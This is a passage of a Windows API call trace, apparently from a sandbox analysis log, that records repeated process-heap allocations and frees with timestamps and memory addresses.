[0059.158] GetProcessHeap () returned 0x280000 [0059.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.158] GetProcessHeap () returned 0x280000 [0059.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.159] GetProcessHeap () returned 0x280000 [0059.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.160] GetProcessHeap () returned 0x280000 [0059.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.161] GetProcessHeap () returned 0x280000 [0059.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.162] GetProcessHeap () returned 0x280000 [0059.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.163] GetProcessHeap () returned 0x280000 [0059.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.163] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.164] GetProcessHeap () returned 0x280000 [0059.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.164] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.165] GetProcessHeap () returned 0x280000 [0059.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.166] GetProcessHeap () returned 0x280000 [0059.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.167] GetProcessHeap () returned 0x280000 [0059.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: 